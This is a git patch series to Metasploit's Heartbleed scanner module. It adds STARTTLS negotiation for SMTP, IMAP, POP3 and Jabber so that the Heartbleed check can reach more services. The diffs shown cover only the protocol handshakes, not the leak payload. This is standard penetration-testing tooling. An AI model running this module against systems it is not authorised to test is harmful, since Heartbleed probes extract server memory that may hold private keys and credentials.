From 9c053a5b91dab693af414997c69062379909f879 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 8 Apr 2014 21:56:05 +0200
Subject: [PATCH 1/2] Added additional protocols

---
 .../scanner/ssl/openssl_heartbleed.rb         | 85 ++++++++++++++++---
 1 file changed, 75 insertions(+), 10 deletions(-)

diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
index d02d727ce4..3ff099c122 100644
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(443),
-        OptBool.new('STARTTLS', [ true, "Use STARTTLS", false])
+        OptEnum.new('PROTOCOL', [true, 'Protocol to use with SSL', 'WEB', [ 'WEB', 'SMTP', 'IMAP', 'JABBER', 'POP3' ]])
       ], self.class)
   end
 
@@ -106,27 +106,92 @@ class Metasploit3 < Msf::Auxiliary
     "#{rhost}:#{rport}"
   end
 
-  def start_ttls
+  def tls_smtp
     sock.get_once
-    sock.put("EHLO starttlstest\n")
+    sock.put("EHLO #{rand_text_alpha(10)}\n")
     res = sock.get_once
-    unless res and res =~ /STARTTLS/
+    unless res and res =~ /STARTTLS/i
       return nil
     end
     sock.put("STARTTLS\n")
     sock.get_once
   end
 
+  def tls_imap
+    sock.get_once
+    sock.put("a001 CAPABILITY\r\n")
+    res = sock.get_once
+    unless res and res =~ /STARTTLS/i
+      return nil
+    end
+    sock.put("a002 STARTTLS\r\n")
+    sock.get_once
+  end
+
+  def tls_pop3
+    sock.get_once
+    sock.put("CAPA\r\n")
+    res = sock.get_once
+    if !res or res =~ /^-/
+      return nil
+    end
+    sock.put("STLS\r\n")
+    res = sock.get_once
+    if !res or res =~ /^-/
+      return nil
+    end
+  end
+
+  def tls_jabber
+    msg = "<?xml version='1.0' ?><stream:stream to='#{rhost}' "
+    msg << "xmlns='jabber:client' "
+    msg << "xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
+    sock.put(msg)
+    res = sock.get_once
+    return nil if res.nil? # SSL not supported
+    return nil if res =~ /stream:error/ or res !~ /starttls/i
+    msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
+    sock.put(msg)
+    sock.get_once
+  end
+
   def run_host(ip)
     connect
 
-    if datastore['STARTTLS']
-      print_status("#{peer} - Trying to STARTTLS...")
-      res = start_ttls
-      if res.nil?
-        print_error("#{peer} - STARTTLS failed...")
+    case datastore['PROTOCOL']
+      when "WEB"
+        # no STARTTLS needed
+      when "SMTP"
+        print_status("Trying to start SSL via SMTP")
+        res = tls_smtp
+        if res.nil?
+          print_error("#{peer} - STARTTLS failed...")
+          return
+        end
+      when "IMAP"
+        print_status("Trying to start SSL via IMAP")
+        res = tls_imap
+        if res.nil?
+          print_error("#{peer} - STARTTLS failed...")
+          return
+        end
+      when "JABBER"
+        print_status("Trying to start SSL via JABBER")
+        res = tls_jabber
+        if res.nil?
+          print_error("#{peer} - STARTTLS failed...")
+          return
+        end
+      when "POP3"
+        print_status("Trying to start SSL via POP3")
+        res = tls_pop3
+        if res.nil?
+          print_error("#{peer} - STARTTLS failed...")
+          return
+        end
+      else
+        print_error("Unknown protocol #{datastore['PROTOCOL']}")
         return
-      end
     end
 
     print_status("#{peer} - Sending Client Hello...")

From 8c7debb81daa21cb7af9bbe0a5d60cdb83f7bc6c Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 8 Apr 2014 22:13:02 +0200
Subject: [PATCH 2/2] Added some comments and modified JABBER

---
 modules/auxiliary/scanner/ssl/openssl_heartbleed.rb | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
index 3ff099c122..b53e76c8e4 100644
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -107,6 +107,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def tls_smtp
+    # https://tools.ietf.org/html/rfc3207
     sock.get_once
     sock.put("EHLO #{rand_text_alpha(10)}\n")
     res = sock.get_once
@@ -118,6 +119,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def tls_imap
+    # http://tools.ietf.org/html/rfc2595
     sock.get_once
     sock.put("a001 CAPABILITY\r\n")
     res = sock.get_once
@@ -129,6 +131,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def tls_pop3
+    # http://tools.ietf.org/html/rfc2595
     sock.get_once
     sock.put("CAPA\r\n")
     res = sock.get_once
@@ -143,9 +146,12 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def tls_jabber
-    msg = "<?xml version='1.0' ?><stream:stream to='#{rhost}' "
-    msg << "xmlns='jabber:client' "
-    msg << "xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>"
+    # http://xmpp.org/extensions/xep-0035.html
+    msg = "<?xml version='1.0' ?>"
+    msg << "<stream:stream xmlns='jabber:client' "
+    msg << "xmlns:stream='http://etherx.jabber.org/streams' "
+    msg << "xmlns:tls='http://www.ietf.org/rfc/rfc2595.txt' "
+    msg << "to='#{rhost}'>"
     sock.put(msg)
     res = sock.get_once
     return nil if res.nil? # SSL not supported